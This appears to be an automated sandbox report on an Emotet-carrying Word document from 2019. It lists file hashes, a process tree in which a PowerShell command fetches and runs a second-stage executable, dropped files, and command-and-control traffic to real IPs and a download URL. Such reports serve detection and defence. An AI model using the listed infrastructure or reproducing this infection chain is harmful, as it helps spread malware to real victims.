| Property | Value |
|---|---|
| Download | CbHqD-uSqdE2FwzZyWUD_txfHBHned-Fq |
| Full analysis | https://app.any.run/tasks/8d355fe5-2696-40ee-b65a-04fdbbc4a83d |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
| Analysis date | April 15, 2019, 14:43:04 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Apr 15 15:26:00 2019, Last Saved Time/Date: Mon Apr 15 15:26:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
| MD5 | 068AC613ECF5D1E77FE4DD9B89290BE1 |
| SHA1 | 944BDBE42C33E01B4A052BD6A8102E18E2648DB9 |
| SHA256 | 2DDBF0F88A1C64BECC86F8290A7C3EE13CF206A6A176CF0548FCBC311C9ABED1 |
| SSDEEP | 6144:b77HUUUUUUUUUUUUUUUUUUUT52Vk5jjZx1k2sXp2PAKDwIaMYVRd:b77HUUUUUUUUUUUUUUUUUUUTCkRr1joF |
| Extension | File type (score) |
|---|---|
| .doc | Microsoft Word document (54.2) |
| .doc | Microsoft Word document (old ver.) (32.2) |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | — |
| TitleOfParts | — |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 3 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | — |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 3 |
| Words | — |
| Pages | 1 |
| ModifyDate | 2019:04:15 14:26:00 |
| CreateDate | 2019:04:15 14:26:00 |
| TotalEditTime | — |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | — |
| Template | Normal.dotm |
| Comments | — |
| Keywords | — |
| Author | — |
| Subject | — |
| Title | — |
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3796 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\CbHqD-uSqdE2FwzZyWUD_txfHBHned-Fq.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 1424 | PoWeRsHelL -e [encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exe | — | WmiPrvSE.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 2488 | "C:\Users\admin\358.exe" | C:\Users\admin\358.exe | — | PoWeRsHelL.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2100 | --ba2b9974 | C:\Users\admin\358.exe | — | 358.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 3768 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 358.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2176 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 3108 | "C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe" | C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 3560 | --f60eeb43 | C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe | — | KgJzUOfu1pZLF8Zss.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2168 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | KgJzUOfu1pZLF8Zss.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
| 2716 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Integrity Level: MEDIUM |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DC4.tmp.cvr | — | — | — |
| 1424 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BZQ3AU4DG8RFZ8VK8K63.temp | — | — | — |
| 3796 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | E0A6D871DF9AF8A843020CC2FC70CA4E | 33FAFDD37700ECE853AC83901FBEAB68A9A8E725B6B27DF6C65EDBF64767BE47 |
| 3796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 64EACABB85CBA1D6FFE49E86A0D25A8A | BA2104545A3D90BFB04475FBAE2FB5A576E3653BBCCB35BA9B6FA59A738E0575 |
| 3560 | KgJzUOfu1pZLF8Zss.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | 5E41928109CDB5AF7EF16B98F7D79C01 | AA52C8ABE36941610FEAEE2BAE4F827D76877B5830356859B71DACCF8C960BF3 |
| 2100 | 358.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | 063652527B287D8C92330CCAC3C703D0 | E91160F0AB3D4632F5074BE92BCBA008A0DD1EF7D6F5AD2DD4ADE968106C6172 |
| 3796 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$HqD-uSqdE2FwzZyWUD_txfHBHned-Fq.doc | pgc | E4BA634AFEE699373AAD5A232685E3C4 | CA353B6DC5F97E64359CEB05175A782DB5EDA403D6025426939AD8DFDBB5A1AE |
| 1424 | PoWeRsHelL.exe | C:\Users\admin\358.exe | executable | 063652527B287D8C92330CCAC3C703D0 | E91160F0AB3D4632F5074BE92BCBA008A0DD1EF7D6F5AD2DD4ADE968106C6172 |
| 1424 | PoWeRsHelL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 33B4C42BAF9E3CA295E3BDCD51C02EAF | B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
| 2176 | soundser.exe | C:\Users\admin\AppData\Local\soundser\KgJzUOfu1pZLF8Zss.exe | executable | 5E41928109CDB5AF7EF16B98F7D79C01 | AA52C8ABE36941610FEAEE2BAE4F827D76877B5830356859B71DACCF8C960BF3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1424 | PoWeRsHelL.exe | GET | 200 | 192.185.41.243:80 | http://busycows.ca/wp-includes/sl_gy/ | US | executable | 131 Kb | suspicious |
2176 | soundser.exe | POST | — | 165.255.52.192:80 | http://165.255.52.192/json/guids/ | ZA | — | — | malicious |
2716 | soundser.exe | POST | — | 82.0.19.40:80 | http://82.0.19.40/teapot/cookies/ | GB | — | — | malicious |
2176 | soundser.exe | POST | 200 | 216.98.148.156:8080 | http://216.98.148.156:8080/chunk/publish/ringin/merge/ | US | binary | 90.7 Kb | malicious |
2176 | soundser.exe | POST | — | 82.0.19.40:80 | http://82.0.19.40/img/raster/ringin/ | GB | — | — | malicious |
2716 | soundser.exe | POST | — | 165.255.52.192:80 | http://165.255.52.192/jit/pnp/ | ZA | — | — | malicious |
2176 | soundser.exe | POST | — | 201.248.5.197:80 | http://201.248.5.197/chunk/sess/ringin/ | VE | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1424 | PoWeRsHelL.exe | 192.185.41.243:80 | busycows.ca | CyrusOne LLC | US | suspicious |
2176 | soundser.exe | 82.0.19.40:80 | — | Virgin Media Limited | GB | malicious |
2176 | soundser.exe | 165.255.52.192:80 | — | Afrihost | ZA | malicious |
2716 | soundser.exe | 165.255.52.192:80 | — | Afrihost | ZA | malicious |
2716 | soundser.exe | 82.0.19.40:80 | — | Virgin Media Limited | GB | malicious |
2176 | soundser.exe | 201.248.5.197:80 | — | CANTV Servicios, Venezuela | VE | malicious |
2176 | soundser.exe | 216.98.148.156:8080 | — | CariNet, Inc. | US | malicious |
| Domain | IP | Reputation |
|---|---|---|
| busycows.ca | — | suspicious |
PID | Process | Class | Message |
---|---|---|---|
1424 | PoWeRsHelL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
1424 | PoWeRsHelL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
1424 | PoWeRsHelL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
1424 | PoWeRsHelL.exe | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2176 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2716 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
2716 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |